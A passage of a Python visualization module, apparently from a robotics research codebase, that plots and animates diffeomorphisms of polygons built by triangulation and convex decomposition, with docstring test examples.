diffeo_params['mu_2'] = 0.01
diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
visualization.visualize_tree_triangulation(xy, diffeo_params)
Polygon examples to test:
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
"""
# Transpose the input
xy_transpose = PolygonVertices.transpose()
# Find the dilated polygon
polygon_dilated = Polygon(PolygonVertices).buffer(DiffeoParams['varepsilon'], join_style=1)
polygon_dilated_vertices_transpose = numpy.vstack((polygon_dilated.exterior.coords.xy[0], polygon_dilated.exterior.coords.xy[1]))
# Plot the initial polygon
plt.plot(xy_transpose[0][:], xy_transpose[1][:], '-b')
plt.axis('equal')
# Find the tree
tree = diffeoTreeTriangulation(PolygonVertices, DiffeoParams)
# Plot the tree
for i in range(0,len(tree)):
triangle = numpy.vstack((tree[i]['vertices'],tree[i]['vertices'][0]))
triangle = triangle.transpose()
plt.plot(triangle[0][:], triangle[1][:], '-b')
polygon_tilde = numpy.vstack((tree[i]['vertices_tilde'],tree[i]['vertices_tilde'][0]))
polygon_tilde = polygon_tilde.transpose()
plt.plot(polygon_tilde[0][:], polygon_tilde[1][:])
plt.plot(tree[i]['center'][0][0], tree[i]['center'][0][1], 'ok')
# Plot the dilated polygon
plt.plot(polygon_dilated_vertices_transpose[0][:], polygon_dilated_vertices_transpose[1][:], '-m')
plt.show()
return tree
def visualize_tree_convex(PolygonVertices, DiffeoParams):
"""
Function that plots the generated tree to be used in the diffeomorphism (based on convex decomposition)
Input:
1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
2) DiffeoParams: Options for the diffeomorphism construction
Test:
import numpy
import visualization
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
diffeo_params = dict()
diffeo_params['p'] = 20
diffeo_params['epsilon'] = 1.0
diffeo_params['varepsilon'] = 1.5
diffeo_params['mu_1'] = 1.0
diffeo_params['mu_2'] = 0.01
diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
visualization.visualize_tree_convex(xy, diffeo_params)
Polygon examples to test:
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
"""
# Transpose the input
xy_transpose = PolygonVertices.transpose()
# Find the dilated polygon
polygon_dilated = Polygon(PolygonVertices).buffer(DiffeoParams['varepsilon'], join_style=1)
polygon_dilated_vertices_transpose = numpy.vstack((polygon_dilated.exterior.coords.xy[0], polygon_dilated.exterior.coords.xy[1]))
# Plot the initial polygon
plt.plot(xy_transpose[0][:], xy_transpose[1][:], '-b')
plt.axis('equal')
# Find the tree
tree = diffeoTreeConvex(PolygonVertices, DiffeoParams)
# Plot the tree
for i in range(0,len(tree)):
polygon = numpy.vstack((tree[i]['augmented_vertices'],tree[i]['augmented_vertices'][0]))
polygon = polygon.transpose()
plt.plot(polygon[0][:], polygon[1][:], '-b')
polygon_tilde = numpy.vstack((tree[i]['vertices_tilde'],tree[i]['vertices_tilde'][0]))
polygon_tilde = polygon_tilde.transpose()
plt.plot(polygon_tilde[0][:], polygon_tilde[1][:])
plt.plot(tree[i]['center'][0][0], tree[i]['center'][0][1], 'ok')
# Plot the dilated polygon
plt.plot(polygon_dilated_vertices_transpose[0][:], polygon_dilated_vertices_transpose[1][:], '-m')
plt.show()
return tree
def visualize_map_triangulation(PolygonVertices, DiffeoParams):
"""
Function that plots the final sphere constructed from a diffeomorphism of one polygon (based on the ear clipping method)
Input:
1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
2) DiffeoParams: Options for the diffeomorphism construction
Test:
import numpy
import visualization
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
diffeo_params = dict()
diffeo_params['p'] = 20
diffeo_params['epsilon'] = 1.0
diffeo_params['varepsilon'] = 1.5
diffeo_params['mu_1'] = 1.0
diffeo_params['mu_2'] = 0.01
diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
visualization.visualize_map_triangulation(xy, diffeo_params)
Polygon examples to test:
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
"""
# Transpose the input
xy_transpose = PolygonVertices.transpose()
# Construct the interpolation functions
t = numpy.linspace(0, PolygonVertices.shape[0]+1, num=PolygonVertices.shape[0], endpoint=True)
f_x = scipy.interpolate.interp1d(t, xy_transpose[0][:])
f_y = scipy.interpolate.interp1d(t, xy_transpose[1][:])
# Find the new points
t_new = numpy.linspace(0, PolygonVertices.shape[0]+1, num=1001, endpoint=True)
x_new = f_x(t_new)
y_new = f_y(t_new)
xy_new = numpy.vstack((x_new,y_new)).transpose()
# Plot the initial polygon
plt.plot(xy_transpose[0][:], xy_transpose[1][:], 'o', x_new, y_new, '-')
plt.axis('equal')
# Find the points on the final sphere
tree = diffeoTreeTriangulation(PolygonVertices, DiffeoParams)
x_deformed_array = numpy.array([[0,0]])
for i in range(len(t_new)):
x_deformed, x_deformedd, x_deformeddd = polygonDiffeoTriangulation(numpy.array([[x_new[i],y_new[i]]]), tree, DiffeoParams)
x_deformed_array = numpy.vstack((x_deformed_array, x_deformed))
# Plot the sphere
x_deformed_array = x_deformed_array[1:][:]
x_deformed_array = x_deformed_array.transpose()
plt.plot(x_deformed_array[0][:], x_deformed_array[1][:], '')
plt.show()
return
def visualize_map_convex(PolygonVertices, DiffeoParams):
"""
Function that plots the final sphere constructed from a diffeomorphism of one polygon (based on the convex decomposition method)
Input:
1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
2) DiffeoParams: Options for the diffeomorphism construction
Test:
import numpy
import visualization
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
diffeo_params = dict()
diffeo_params['p'] = 20
diffeo_params['epsilon'] = 1.0
diffeo_params['varepsilon'] = 1.5
diffeo_params['mu_1'] = 1.0
diffeo_params['mu_2'] = 0.01
diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
visualization.visualize_map_convex(xy, diffeo_params)
Polygon examples to test:
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
"""
# Transpose the input
xy_transpose = PolygonVertices.transpose()
# Construct the interpolation functions
t = numpy.linspace(0, PolygonVertices.shape[0]+1, num=PolygonVertices.shape[0], endpoint=True)
f_x = scipy.interpolate.interp1d(t, xy_transpose[0][:])
f_y = scipy.interpolate.interp1d(t, xy_transpose[1][:])
# Find the new points
t_new = numpy.linspace(0, PolygonVertices.shape[0]+1, num=1001, endpoint=True)
x_new = f_x(t_new)
y_new = f_y(t_new)
xy_new = numpy.vstack((x_new,y_new)).transpose()
# Plot the initial polygon
plt.plot(xy_transpose[0][:], xy_transpose[1][:], 'o', x_new, y_new, '-')
plt.axis('equal')
# Find the points on the final sphere
tree = diffeoTreeConvex(PolygonVertices, DiffeoParams)
x_deformed_array = numpy.array([[0,0]])
for i in range(len(t_new)):
x_deformed, x_deformedd, x_deformeddd = polygonDiffeoConvex(numpy.array([[x_new[i],y_new[i]]]), tree, DiffeoParams)
x_deformed_array = numpy.vstack((x_deformed_array, x_deformed))
# Plot the sphere
x_deformed_array = x_deformed_array[1:][:]
x_deformed_array = x_deformed_array.transpose()
plt.plot(x_deformed_array[0][:], x_deformed_array[1][:], '')
plt.show()
return
def visualize_purging_triangulation(PolygonVertices, DiffeoParams, FramesPerTriangle, TimeInterval, SaveOption):
"""
Function that shows an animation for a purging diffeomorphism of one polygon (based on the ear clipping method)
Input:
1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
2) DiffeoParams: Options for the diffeomorphism construction
3) FramesPerTriangle: Frames per triangle visualization
4) TimeInterval: Time interval in ms between each frame
5) SaveOption: True if gif is to be saved, False otherwise
Test:
import numpy
import visualization
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
diffeo_params = dict()
diffeo_params['p'] = 20
diffeo_params['epsilon'] = 1.0
diffeo_params['varepsilon'] = 1.5
diffeo_params['mu_1'] = 1.0
diffeo_params['mu_2'] = 0.01
diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
visualization.visualize_purging_triangulation(xy, diffeo_params, 30, 50, False)
Polygon examples to test:
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
"""
# Find the polygon
input_polygon = Polygon(PolygonVertices)
# Transpose the input
xy_transpose = PolygonVertices.transpose()
# Construct the interpolation functions
t = numpy.linspace(0, PolygonVertices.shape[0]+1, num=PolygonVertices.shape[0], endpoint=True)
f_x = scipy.interpolate.interp1d(t, xy_transpose[0][:])
f_y = scipy.interpolate.interp1d(t, xy_transpose[1][:])
# Find the new points
t_new = numpy.linspace(0, PolygonVertices.shape[0]+1, num=1001, endpoint=True)
x_new = f_x(t_new)
y_new = f_y(t_new)
xy_new = numpy.vstack((x_new,y_new)).transpose()
# Find the diffeomorphism tree
tree = diffeoTreeTriangulation(PolygonVertices, DiffeoParams)
# # Find grid points
# nrows = 1 + int(numpy.ceil((numpy.max(y_new)+0.5)-(numpy.min(y_new)-0.5))/0.5)
# ncols = 1 + int(numpy.ceil((numpy.max(x_new)+0.5)-(numpy.min(x_new)-0.5))/0.5)
# discretization_rows = ((numpy.max(y_new)+0.5)-(numpy.min(y_new)-0.5))/(nrows-1)
# discretization_cols = ((numpy.max(x_new)+0.5)-(numpy.min(x_new)-0.5))/(ncols-1)
# num_points = 1000
# x_grid = []
# y_grid = []
# for row in range(0,nrows):
# result_x = numpy.array([])
# result_y = numpy.array([])
# for point_index in range(0,num_points):
# x_point = (numpy.min(x_new)-0.5) + (point_index/num_points)*((numpy.max(x_new)+0.5)-(numpy.min(x_new)-0.5))
# y_point = (numpy.min(y_new)-0.5) + row*discretization_rows
# if not input_polygon.contains(Point(x_point,y_point)):
# result_x = numpy.hstack((result_x,x_point))
# result_y = numpy.hstack((result_y,y_point))
# else:
# x_grid.append(result_x)
# y_grid.append(result_y)
# result_x = numpy.array([])
# result_y = numpy.array([])
# x_grid.append(result_x)
# y_grid.append(result_y)
# for col in range(0,ncols):
# result_x = numpy.array([])
# result_y = numpy.array([])
# for point_index in range(0,num_points):
# x_point = (numpy.min(x_new)-0.5) + col*discretization_cols
# y_point = (numpy.min(y_new)-0.5) + (point_index/num_points)*((numpy.max(y_new)+0.5)-(numpy.min(y_new)-0.5))
# if not input_polygon.contains(Point(x_point,y_point)):
# result_x = numpy.hstack((result_x,x_point))
# result_y = numpy.hstack((result_y,y_point))
# else:
# x_grid.append(result_x)
# y_grid.append(result_y)
# result_x = numpy.array([])
# result_y = numpy.array([])
# x_grid.append(result_x)
# y_grid.append(result_y)
# Initialize plot
fig, ax = plt.subplots()
fig.set_tight_layout(True)
xy_plot, = ax.plot(x_new, y_new, '-', linewidth = 2)
# xy_grid = [None]*len(x_grid)
# for i in range(0,len(x_grid)):
# xy_grid[i], = ax.plot(x_grid[i], y_grid[i], '-')
# xy_grid[i].set_color('gray')
ax.axis([numpy.min(x_new)-0.5,numpy.max(x_new)+0.5,numpy.min(y_new)-0.5,numpy.max(y_new)+0.5])
ax.set_aspect('equal', 'box')
ax.set_yticks([])
ax.set_xticks([])
# Iterate through the tree for the polygon points
x_to_animate = numpy.array([x_new])
y_to_animate = numpy.array([y_new])
for j in range(len(tree)):
x_deformed_array = numpy.array([[0,0]])
for k in range(0,len(t_new)):
x_deformed, x_deformedd, x_deformeddd = triangleDiffeo(numpy.array([[x_to_animate[-1][k],y_to_animate[-1][k]]]), tree[j], DiffeoParams)
x_deformed_array = numpy.vstack((x_deformed_array, x_deformed))
x_deformed_array = x_deformed_array[1:][:].transpose()
x_to_animate = numpy.vstack((x_to_animate,x_deformed_array[0][:]))
y_to_animate = numpy.vstack((y_to_animate,x_deformed_array[1][:]))
x_to_animate = numpy.vstack((x_to_animate,x_deformed_array[0][:]))
y_to_animate = numpy.vstack((y_to_animate,x_deformed_array[1][:]))
# # Iterate through the tree for the grid points
# x_to_animate_grid = [None]*len(x_grid)
# y_to_animate_grid = [None]*len(y_grid)
# for i in range(0,len(x_grid)):
# x_to_animate_grid[i] = numpy.array([x_grid[i]])
# y_to_animate_grid[i] = numpy.array([y_grid[i]])
# for j in range(len(tree)):
# x_deformed_array_grid = numpy.array([[0,0]])
# for k in range(0,len(x_grid[i])):
# x_deformed_grid, x_deformedd_gri, x_deformeddd_grid = triangleDiffeo(numpy.array([[x_to_animate_grid[i][-1][k],y_to_animate_grid[i][-1][k]]]), tree[j], DiffeoParams)
# x_deformed_array_grid = numpy.vstack((x_deformed_array_grid, x_deformed_grid))
# x_deformed_array_grid = x_deformed_array_grid[1:][:].transpose()
# x_to_animate_grid[i] = numpy.vstack((x_to_animate_grid[i],x_deformed_array_grid[0][:]))
# y_to_animate_grid[i] = numpy.vstack((y_to_animate_grid[i],x_deformed_array_grid[1][:]))
# x_to_animate_grid[i] = numpy.vstack((x_to_animate_grid[i],x_deformed_array_grid[0][:]))
# y_to_animate_grid[i] = numpy.vstack((y_to_animate_grid[i],x_deformed_array_grid[1][:]))
def update(i):
# Find the index to consider
index_to_consider = int(numpy.floor(i/FramesPerTriangle))
label = 'Purging triangle {0}'.format(index_to_consider+1)
# Animate data
xy_plot.set_xdata(((i%FramesPerTriangle)/FramesPerTriangle)*x_to_animate[index_to_consider+1][:] + (1-((i%FramesPerTriangle)/FramesPerTriangle))*x_to_animate[index_to_consider][:])
xy_plot.set_ydata(((i%FramesPerTriangle)/FramesPerTriangle)*y_to_animate[index_to_consider+1][:] + (1-((i%FramesPerTriangle)/FramesPerTriangle))*y_to_animate[index_to_consider][:])
# for j in range(0,len(x_grid)):
# xy_grid[j].set_xdata(((i%FramesPerTriangle)/FramesPerTriangle)*x_to_animate_grid[j][index_to_consider+1][:] + (1-((i%FramesPerTriangle)/FramesPerTriangle))*x_to_animate_grid[j][index_to_consider][:])
# xy_grid[j].set_ydata(((i%FramesPerTriangle)/FramesPerTriangle)*y_to_animate_grid[j][index_to_consider+1][:] + (1-((i%FramesPerTriangle)/FramesPerTriangle))*y_to_animate_grid[j][index_to_consider][:])
ax.set_xlabel(label)
if SaveOption == True:
fig.savefig('./../../data/visualizations/figure_' + str(i) + '.pdf', bbox_inches='tight')
return xy_plot, ax
# Initialize FuncAnimation object
anim = FuncAnimation(fig, update, frames=numpy.arange(0, 1+FramesPerTriangle*len(tree)), interval=TimeInterval)
if SaveOption == True:
anim.save('./../../data/visualizations/diffeomorphism_triangulation.gif', dpi=80, writer='imagemagick')
else:
plt.show()
return
def visualize_purging_convex(PolygonVertices, DiffeoParams, FramesPerPolygon, TimeInterval, SaveOption):
"""
Function that shows an animation for a purging diffeomorphism of one polygon (based on convex decomposition)
Input:
1) PolygonVertices: Vertex Coordinates of input polygon - Nx2 numpy.array (start and end vertices must be the same)
2) DiffeoParams: Options for the diffeomorphism construction
3) FramesPerPolygon: Frames per triangle visualization
4) TimeInterval: Time interval in ms between each frame
5) SaveOption: True if gif is to be saved, False otherwise
Test:
import numpy
import visualization
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
diffeo_params = dict()
diffeo_params['p'] = 20
diffeo_params['epsilon'] = 1.0
diffeo_params['varepsilon'] = 1.5
diffeo_params['mu_1'] = 1.0
diffeo_params['mu_2'] = 0.01
diffeo_params['workspace'] = numpy.array([[-100,-100],[100,-100],[100,100],[-100,100],[-100,-100]])
visualization.visualize_purging_convex(xy, diffeo_params, 30, 50, False)
Polygon examples to test:
xy = numpy.array([[2.518,1.83,2.043,2.406,2.655,2.518], [0.5048,0.2963,-0.2348,-0.8039,-0.0533,0.5048]]).transpose()
xy = numpy.array([[0,5,5,0,0,4,4,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[2.8,6.2,6.2,2.8,2.8,4.8,4.8,2.8,2.8,4.8,4.8,2.8,2.8], [1.4,1.4,10,10,8.6,8.6,7,7,4.4,4.4,2.8,2.8,1.4]]).transpose()
xy = numpy.array([[7,6,4,5.4,5.1,7,8.9,8.6,10,8,7], [9.5,7.6,7.2,5.6,3.5,4.4,3.5,5.6,7.2,7.6,9.5]]).transpose()
xy = numpy.array([[7,9.5,10,9,9,8,9,10,11,10,9,7], [7,8,7,6,7,7,5,5,7,9,9,7]]).transpose()
xy = numpy.array([[7,7,8,8,7,7,10,10,9,9,10,10,7], [7,6,6,1,1,0,0,1,1,6,6,7,7]]).transpose()
xy = numpy.array([[0,10,10,0,0,9,9,0,0], [0,0,5,5,4,4,1,1,0]]).transpose()
xy = numpy.array([[0,0.5,0.5,1.5,1.5,-1,-1,3,3,2,2,0,0], [0,0,-1,-1,1,1,-3,-3,1,1,-2,-2,0]]).transpose()
xy = numpy.vstack((sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[0],sp.geometry.polygon.orient(LineString(numpy.array([[0,0],[0,1],[-1,1],[-1,-1],[1,-1],[1,2],[-2,2],[-2,-2],[2,-2],[2,3],[-3,3],[-3,-3],[3,-3],[3,4],[-3,4]])).buffer(0.2).simplify(0.05),1.0).exterior.coords.xy[1])).transpose()
"""
# Find the polygon
input_polygon = Polygon(PolygonVertices)
# Transpose the input
xy_transpose = PolygonVertices.transpose()
# Construct the interpolation functions
t = numpy.linspace(0, PolygonVertices.shape[0]+1, num=PolygonVertices.shape[0], endpoint=True)
f_x = scipy.interpolate.interp1d(t, xy_transpose[0][:])
f_y = scipy.interpolate.interp1d(t, xy_transpose[1][:])
# Find the new points
t_new = numpy.linspace(0, PolygonVertices.shape[0]+1, num=1001, endpoint=True)
x_new = f_x(t_new)
y_new = f_y(t_new)
xy_new = numpy.vstack((x_new,y_new)).transpose()
# Find the diffeomorphism tree
tree = diffeoTreeConvex(PolygonVertices, DiffeoParams)
# # Find grid points
# nrows = 1 + int(numpy.ceil((numpy.max(y_new)+0.5)-(numpy.min(y_new)-0.5))/0.5)
# ncols = 1 + int(numpy.ceil((numpy.max(x_new)+0.5)-(numpy.min(x_new)-0.5))/0.5)
# discretization_rows = ((numpy.max(y_new)+0.5)-(numpy.min(y_new)-0.5))/(nrows-1)
# discretization_cols = ((numpy.max(x_new)+0.5)-(numpy.min(x_new)-0.5))/(ncols-1)
# num_points = 1000
# x_grid = []
# y_grid = []
# for row in range(0,nrows):
# result_x = numpy.array([])
# result_y = numpy.array([])
# for point_index in range(0,num_points):
# x_point = (numpy.min(x_new)-0.5) + (point_index/num_points)*((numpy.max(x_new)+0.5)-(numpy.min(x_new)-0.5))
# y_point = (numpy.min(y_new)-0.5) + row*discretization_rows
# if not input_polygon.contains(Point(x_point,y_point)):
# result_x = numpy.hstack((result_x,x_point))
# result_y = numpy.hstack((result_y,y_point))
# else:
# x_grid.append(result_x)
# y_grid.append(result_y)
# result_x = numpy.array([])
# result_y = numpy.array([])
# x_grid.append(result_x)
# y_grid.append(result_y)
# for col in range(0,ncols):
# result_x = numpy.array([])
# result_y = numpy.array([])
# for point_index in range(0,num_points):
# x_point = (numpy.min(x_new)-0.5) + col*discretization_cols
# y_point = (numpy.min(y_new)-0.5) + (point_index/num_points)*((numpy.max(y_new)+0.5)-(numpy.min(y_new)-0.5))
# if not input_polygon.contains(Point(x_point,y_point)):
# result_x = numpy.hstack((result_x,x_point))
# result_y = numpy.hstack((result_y,y_point))
# else:
# x_grid.append(result_x)
# y_grid.append(result_y)
# result_x = numpy.array([])
# result_y = numpy.array([])
# x_grid.append(result_x)
# y_grid.append(result_y)
# Initialize plot
fig, ax = plt.subplots()
fig.set_tight_layout(True)
xy_plot, = ax.plot(x_new, y_new, '-', linewidth = 2)
# xy_grid = [None]*len(x_grid)
# for i in range(0,len(x_grid)):
# xy_grid[i], = ax.plot(x_grid[i], y_grid[i], '-')
# xy_grid[i].set_color('gray')
ax.axis([numpy.min(x_new)-0.5,numpy.max(x_new)+0.5,numpy.min(y_new)-0.5,numpy.max(y_new)+0.5])
ax.set_aspect('equal', 'box')
ax.set_yticks([])
ax.set_xticks([])
# Iterate through the tree for the polygon points
x_to_animate = numpy.array([x_new])
y_to_animate = numpy.array([y_new])
